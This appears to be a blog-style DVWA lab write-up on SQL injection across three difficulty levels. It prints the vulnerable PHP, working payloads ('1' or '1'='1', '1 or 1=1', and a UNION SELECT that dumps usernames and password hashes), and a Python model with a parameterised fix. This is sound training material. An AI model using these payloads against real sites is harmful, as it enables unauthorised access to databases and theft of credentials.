SQL injection

This time I will tell you a little about the SQL injection I am studying. I learned by practising directly in DVWA (Damn Vulnerable Web Application). I started from the low level, and here is the PHP source that we must inject:
"
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];

    // No filtering at all: the raw value goes straight into the quoted SQL string
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
    $num = mysql_numrows($result);

    $i = 0;
    while ($i < $num) {
        $first = mysql_result($result, $i, "first_name");
        $last  = mysql_result($result, $i, "last_name");
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>
"
At this level nothing we enter is filtered by the program, so we can enter a query that makes the application display all the contents of the table. For example we can insert:
1' or '1'='1
so the SQL query becomes:
 SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1
with the following results:
ID: 1' or '1' ='1
   First name: admin
   Surname: admin
ID: 1' or '1' ='1
   First name: Gordon
   Surname: Brown
ID: 1' or '1' ='1
   First name: Hack
   Surname: Me
ID: 1' or '1' ='1
   First name: Pablo
   Surname: Picasso
ID: 1' or '1' ='1
   First name: Bob
   Surname: Smith
This makes the WHERE condition always true, so the application displays all the contents of the table. The low level is solved; now we move on to the medium level, and here is the PHP source we must get past to inject the database:
"
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];

    // Quotes are escaped, but the value is used unquoted in the SQL below
    $id = mysql_real_escape_string($id);
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
    $num = mysql_numrows($result);

    $i = 0;
    while ($i < $num) {
        $first = mysql_result($result, $i, "first_name");
        $last  = mysql_result($result, $i, "last_name");
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>
"
At this level there is a small filter (mysql_real_escape_string) that stops us from entering quotes, but that is not a problem because this query no longer needs them: $id is placed in the SQL without quotes. We get through by entering the following:
1 or 1=1
so the SQL query becomes:
 SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1
ID: 1 or 1=1
   First name: admin
   Surname: admin
ID: 1 or 1=1
   First name: Gordon
   Surname: Brown
ID: 1 or 1=1
   First name: Hack
   Surname: Me
ID: 1 or 1=1
   First name: Pablo
   Surname: Picasso
ID: 1 or 1=1
   First name: Bob
   Surname: Smith
 or in this way, entering 1 union all select user,password from users-- so that the query becomes:
 SELECT first_name, last_name FROM users WHERE user_id = 1 union all select user,password from users--
ID: 1 union all select user,password from users--
   First name: admin
   Surname: admin
ID: 1 union all select user,password from users--
   First name: admin
   Surname: 900150983cd24fb0d6963f7d28e17f72
ID: 1 union all select user,password from users--
   First name: gordonb
   Surname: e99a18c428cb38d5f260853678922e03
ID: 1 union all select user,password from users--
   First name: 1337
   Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1 union all select user,password from users--
   First name: pablo
   Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1 union all select user,password from users--
   First name: smithy
   Surname: 5f4dcc3b5aa765d61d8327deb882cf99



The medium level is not much different from the low level. After passing the low and medium levels it is now time to enter the high level, and the PHP source code follows:
"
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];

    $id = stripslashes($id);
    $id = mysql_real_escape_string($id);

    // Only numeric values reach the query, and the value is quoted as well
    if (is_numeric($id)) {
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
        $num = mysql_numrows($result);

        $i = 0;
        while ($i < $num) {
            $first = mysql_result($result, $i, "first_name");
            $last  = mysql_result($result, $i, "last_name");
            echo '<pre>';
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
            echo '</pre>';
            $i++;
        }
    }
}
?>
"
For this high level I have not been able to solve it for real, but in a dream I have had, three times, the dream of finding a way to inject the source code.
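To make the three levels comparable side by side, here is an added Python model of how each DVWA level builds its query, plus a parameterised version that binds the value as data. It is not DVWA's code: the users rows are constructed, SQLite stands in for MySQL, escape() doubles quotes instead of backslash-escaping them, and is_numeric() is only a rough imitation of PHP's.

```python
import sqlite3

# Constructed sample rows modelled on DVWA's users table (not DVWA's own data).
USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me"),
         (4, "Pablo", "Picasso"), (5, "Bob", "Smith")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn

def escape(value):
    # Stand-in for mysql_real_escape_string using SQLite's quote doubling
    # instead of MySQL's backslash escaping (assumption made for this model).
    return value.replace("'", "''")

def is_numeric(value):
    # Rough stand-in for PHP's is_numeric(): integers and decimals pass.
    try:
        float(value)
        return True
    except ValueError:
        return False

def lookup(conn, level, user_id):
    """Fetch (first_name, last_name) rows for user_id, building the query the
    way each DVWA level does. None means the input was rejected before the
    query ran, or the injected text produced an SQL error."""
    base = "SELECT first_name, last_name FROM users WHERE user_id = "
    if level == "low":
        sql = base + f"'{user_id}'"            # raw input inside quotes
    elif level == "medium":
        sql = base + escape(user_id)           # quotes escaped, but value unquoted
    elif level == "high":
        if not is_numeric(user_id):            # non-numeric input never reaches SQL
            return None
        sql = base + f"'{escape(user_id)}'"
    elif level == "fixed":
        # Parameterised query: the value is bound as data, never parsed as SQL.
        return conn.execute(base + "?", (user_id,)).fetchall()
    else:
        raise ValueError(f"unknown level {level!r}")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None
```

Running the page's two inputs through each level shows why escaping alone does not help when the value is unquoted, and why the bound parameter returns nothing for either input.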
 
